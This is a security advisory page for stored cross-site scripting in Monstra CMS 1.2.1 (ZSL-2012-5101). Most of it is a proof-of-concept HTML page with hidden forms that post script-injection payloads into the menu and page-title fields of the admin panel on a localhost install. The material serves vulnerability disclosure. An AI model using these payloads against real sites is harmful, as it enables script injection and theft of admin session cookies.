Monstra 1.2.1 Cross Site Scripting

2012.08.23
Credit: Gjoko 'LiquidWorm' Krstic
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

<!DOCTYPE html> <!-- Monstra 1.2.1 Multiple HTML Injection Vulnerabilities Vendor: MONSTRA.ORG Product web page: http://www.monstra.org Affected version: 1.2.1 Summary: Monstra is fast and small content management system written in PHP! It's free, open source and easy to use from the start! Desc: Monstra suffers from multiple stored XSS vulnerabilities when parsing user input to the 'menu_item_link', 'menu_item_name' and 'page_title' parameters via POST method thru 'index.php' script. Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, and influence or misrepresent how Web content is served, cached, or interpreted. Tested on: Microsoft Windows 7 Ultimate SP1 (EN) Apache 2.4.2 (Win32) PHP 5.4.4 MySQL 5.5.25a Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2012-5101 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5101.php 21.08.2012 --> <html> <head> <title>Monstra 1.2.1 Multiple HTML Injection Vulnerabilities</title> </head> <body> <form id="add_menu" method="POST" action="http://localhost/monstra/admin/index.php?id=menu&action=add"> <input type="hidden" name="csrf" value="a7de775dce681ae31b7e8954d6305667b0df69e0" /> <input type="hidden" name="menu_add_item" value="Save" /> <input type="hidden" name="menu_item_link" value='"><script>alert(1);</script>' /> <input type="hidden" name="menu_item_name" value='"><script>alert(2);</script>' /> <input type="hidden" name="menu_item_order" value="0" /> <input type="hidden" name="menu_item_target" value="" /> </form> <form id="add_page" method="POST" action="http://localhost/monstra/admin/index.php?id=pages&action=add_page"> <input type="hidden" name="add_page_and_exit" value="Save and exit" /> <input type="hidden" name="csrf" value="a7de775dce681ae31b7e8954d6305667b0df69e0" /> <input type="hidden" name="day" value="21" /> <input type="hidden" name="editor" value="Tojmi Sesvidja" /> <input type="hidden" name="minute" value="17" /> <input type="hidden" name="month" value="08" /> <input type="hidden" name="page_description" value="Zero Science Lab" /> <input type="hidden" name="page_keywords" value="ZSL-2012-5101" /> <input type="hidden" name="page_name" value="XSS" /> <input type="hidden" name="page_title" value='"><script>alert(3);</script>' /> <input type="hidden" name="pages" value="0" /> <input type="hidden" name="second" value="29" /> <input type="hidden" name="status" value="published" /> <input type="hidden" name="templates" value="index" /> <input type="hidden" name="year" value="2012" /> </form> <script type="text/javascript"> function xss1(){document.forms["add_menu"].submit();} function xss2(){document.forms["add_page"].submit();} </script> <input type="button" value="Execute XSS 1" onClick="xss1()" /> <br /><br /> <input type="button" value="Execute XSS 2" onClick="xss2()" /> </body> </html>

References:

http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5101.php


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top